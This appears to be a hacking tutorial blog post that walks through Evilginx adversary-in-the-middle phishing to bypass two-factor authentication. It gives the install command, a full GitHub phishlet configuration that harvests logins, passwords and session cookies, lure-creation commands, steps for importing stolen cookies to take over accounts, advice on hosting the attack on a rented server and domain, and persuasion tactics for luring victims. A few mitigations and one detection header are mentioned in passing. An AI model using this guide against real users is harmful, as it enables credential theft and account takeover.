To prevent password theft and hacking, many apps have adopted 2FA authentication. 2FA or 2-factor authentication requires the user to authenticate themselves not only using a username and password (1-factor authentication), but also a second method of authentication, such as sending a password of a (2-factor authentication) on an authenticated device such as a phone. This makes it much more difficult for the hacker to hack into accounts like email, Facebook, Twitter, etc.
Almost all major hacking groups, including the NSA and Sandworm, use social engineering to break into large information systems.
In this guide, we will see how evilginx can help us get the credentials from a user who has 2FA enabled.
As you should already know, “Phishing” is when someone tries to steal important information such as usernames, passwords, credit card numbers or bank details. This is often done by pretending to be a trusted source, such as a bank or a popular website, and tricking people into giving them their sensitive information. It's like how a fisherman uses bait to catch fish – the attacker uses a fake message or fake website to lure their victims.
Evilginx takes phishing to the next level by intercepting communication between users and legitimate websites. It sets up a "man-in-the-middle" attack, meaning it secretly intercepts the data passing between a user and a website. When a user enters their login information on a website they believe to be trustworthy, Evilginx captures that information in real time.
What makes Evilginx particularly powerful is its ability to handle sophisticated attacks. For example, it can bypass two-factor authentication (2FA). Normally, 2FA adds an extra layer of security by requiring users to enter a temporary code sent to their phone/email or biometrics (fingerprint scans or facial recognition) in addition to their password. However, Evilginx can present a fake 2FA prompt to the user after they enter their initial credentials, tricking them into entering the 2FA code as well.
Table of Contents
How Evilginx works
Before entering combat, you need to understand your weapon, know how to keep it in good working order, and understand its strengths and weaknesses. So let's take a look at how Evilginx works.
Evilginx does not serve its own HTML look-alike pages like in traditional phishing attacks. Instead, Evilginx becomes a web proxy. Each packet, originating from the victim's browser, is intercepted, modified and forwarded to the real website. The same happens with response packets, originating from the website: they are intercepted, modified and sent back to the victim. With Evilginx you don't need to create your own HTML templates. From the victim's side, everything looks like they are communicating with a legitimate website. The user has no idea that Evilginx is doing Man-in-the-middle, analyzes each packet and records usernames, passwords and, of course, session cookies.
The process works like this:
-
The attacker creates a fake link on his own server with Evilginx.
-
They send this link to the victim via email or text.
-
When the victim clicks on the link, they see a fake login page created by Evilginx.
-
The victim enters their username and password. If there is two-factor authentication, it completes that as well.
-
Once connected, the victim is redirected to the actual website.
-
Now, the attacker has the victim's email, password, and session cookies. It can use them to fully control the victim's account, even bypassing two-factor authentication.
Now, let's explore the main features of this software:
-
Evilginx serves as a platform to perform phishing attacks on various online services.
-
An important feature of Evilginx is its ability to bypass two-factor authentication (2FA).
-
Evilginx can also intercept session cookies.
-
It's designed with modularity and customization in mind, allowing attackers to adapt it for different phishing campaigns and seamlessly integrate with other tools and frameworks.
However, it is important to remember that there are effective ways to mitigate the risks posed by Evilginx:
-
Developers can implement domain verification for the current page being viewed.
-
Verification codes can be hidden dynamically.
-
The TLS session continuation implementation adds an extra layer of security.
-
Including secret tokens with POST requests for login credentials enhances security.
-
When using Evilginx, all request packets include the “X-Evilginx” HTTP header, which can help detect its presence.
Installation
Generally, to make Evilginx work properly, you need to register a domain and rent a virtual server. But it is possible to test the basic functionality without all this in the Kali Linux virtual machine.
You can install Evilginx in two ways: either by building it from source or, if you're using Kali, by downloading it from the repository. For the second option, just run the following command:
kali> sudo apt install evilginx2 -y
After installing any software, it is a good practice to open the help screen if you have not used it before.
Here you should pay attention to the “-developer” option, which will generate SSL certificates for all hostnames. Otherwise, if you haven't purchased any domains yet, you won't be able to run the test (you'll just get an error about failing to establish a secure connection). The second important option is the path to your phishlets.
Phishlets are small YAML files, used to configure Evilginx to target specific websites. By default, phishlets are located in the root directory of the Evilginx binary. If you installed Evilginx from the Kali repository, the default path is /usr/share/evilginx/phishlets/.
Local installation
Now we need a domain. I'm assuming you don't have one yet, so let's find one and point our domain through the /etc/hosts file to localhost's IP. The main function of the hosts file is to map hostnames to IP addresses locally, allowing the system to resolve domain names without querying external DNS servers.
In my case, I will use the domain “security-update-v102.com”. To edit the hosts file, you can use any text editor you like. We need to specify the IP address, in this case 127.0.0.1 or localhost, and the domain.
Now let's get back to Evilginx.
After installation, only an “example” phishlet is displayed and it is in disabled state. Also, when you start Evilginx for the first time you will see warning messages about server domain and server ipv4 not being set.
This is the first thing you need to set up.
: config domain
:config ipv4
To avoid using an example config file, I found a pre-built file developed by “audibleblink”, specially adapted for GitHub:
min_ver: '2.3.0'
proxy_hosts:
– {phish_sub: ”, orig_sub: ”, domain: 'github.com', session: true, is_landing: true}
– {phish_sub: 'api', orig_sub: 'api', domain: 'github.com'}
– {phish_sub: 'github', orig_sub: 'github', domain: 'githubassets.com'}
– {phish_sub: 'github', orig_sub: 'github', domain: 'github.com'}
sub_filters:
– {triggers_on: 'github.com', orig_sub: ”, domain: 'github.com', search: 'integrity=”(.*?)”', replace: ”, mimes: ['text/html']}
auth_tokens:
– domain: '.github.com'
keys: ['logged_in', 'dotcom_user']
– domain: 'github.com'
keys: ['user_session', '_gh_sess']
credentials:
username:
key: 'login'
search: '(.*)'
type: 'post'
password:
key: 'password'
search: '(.*)'
type: 'post'
login:
domain: 'github.com'
path: '/login'
To use it, you need to create a file with YAML extension in the directory where your other phishlets are located. There are also “api” and “github” subdomains under proxy_hosts, so you need to point those too through the hosts file.
The next step is to create a hostname for your phishing URL. You can choose any hostname you want with as many subdomains as you want, as long as it ends in the top-level domain you set with config domain.
In my case, I'll leave it the same as the server one.
: phishlets hostname
Now it's time to activate the phishlet.
: phishlets enable
After entering the “phishlets” command, we see that the status has changed and the hostname has been added.
The next step is to create a decoy. Baits are essentially pre-generated phishing links that you will send to your target. Must be assigned to a specific phishlet.
: lures create
The decoy you create will automatically be given an ID. To check the full path by ID, you can use the command:
: lures get-url
You can now open this link in a browser after clearing the cache. You will receive the following warning because a self-signed SSL certificate is used and the browser does not trust it.
You must manually configure your browser to trust certificates from Evilginx. To do this, go to the settings and upload the file to the path: /home/kali/.evilginx/crt/ca.crt
After that, you can reload the phishing page.
In the terminal, you can see a notification that someone has visited your bait.
If the victim logs in, you will receive a login, password and session cookies.
Once users open the phishing link, a new phishing session will be created to track the progress of the phishing attempt. When they send their credentials through tracking parameters, those credentials will be stored.
By entering the ID, we can see it in more detail.
You can now install a browser extension to process cookies and enter the data.
After the page restarts, you will be logged into the victim's account.
How will we cover our tracks?
You must purchase:
-
Virtual Server (AWS, DigitalOcean, Godaddy or any other provider)
-
Domain Name (Namecheap, Hostinger, Bluehost, etc.)
After purchasing a VPS, you will have a public IPv4 address to point the domain to. To do this, you'll need to find the DNS zone processing section of your domain registrar and direct the necessary subdomains using A records, just like we did through the hosts file. For example, I'm going to work with the Github phishlet later, so it's worth pointing the subdomains “api” and “github” because they're defined in the YAML configuration file.
But after adding, you need to wait from 2 to 48 hours for the DNS zone to be updated for our changes to take effect. You can follow the updates by following the link: https://dnschecker.org/
Installing Evilginx on a virtual server looks exactly the same, you can change your OS repositories to Kali and download the software from there or download it from Github.
The Art of Social Engineering
Let's now take a closer look at social engineering and what concepts you can use to encourage a target to click on a link. Among the most common agents of social engineering in information technology are:
-
Phishing – Sending multiple emails to trick some people into clicking on harmful links. This is probably the most common social engineering attack, but increasingly less effective.
-
Spear Phishing – Targeting a single person with email attacks. It typically includes extensive OSINT to understand the target's interests, needs, and motivations. When executed correctly, this approach can be highly effective.
-
Whaling – An email addressed to a very powerful person.
-
vishing – Very similar to phishing, but done with voice calls.
-
Baiting – similar to phishing, where the attacker lures victims with the promise of a large reward.
-
Quid Pro Quo – In Latin it means "something for something". In this social engineering attack, the target is promised a benefit in exchange for information or another service.
In any case, you should always conduct good reconnaissance and choose the right carrier.
The next important step is to choose an influence strategy, and here are some key ones:
-
Reciprocity – Humans have a natural tendency to be helpful, so if an attacker offers something to the target, the target will often feel compelled to reciprocate by offering something in return when asked.
-
Obligation: The aggressor creates a sense of obligation by offering kindness or friendliness.
-
Concession: Similar to reciprocity, the attacker asks for more than necessary and settles for the desired outcome (for example, asking for $200 while targeting $100 and convincing the target to agree to $100).
-
Scarcity: The attacker constructs the flaw to prompt the target to act quickly before the opportunity is lost.
-
Authority: The attacker assumes the power to coerce the target into revealing information or taking action. “Hello, I'm the help desk and we're doing a system update. We need your username and password to update the new system”.
-
Consensus: The attacker convinces the target that "everyone knows" or "everyone is doing" something to get them to comply. Like everyone knows that bitcoin will hit $1.000,00 per bitcoin.
In conclusion
Social engineering is one of every hacker's most powerful tools. Don't overlook it as it will help you on your way to becoming a top class hacker!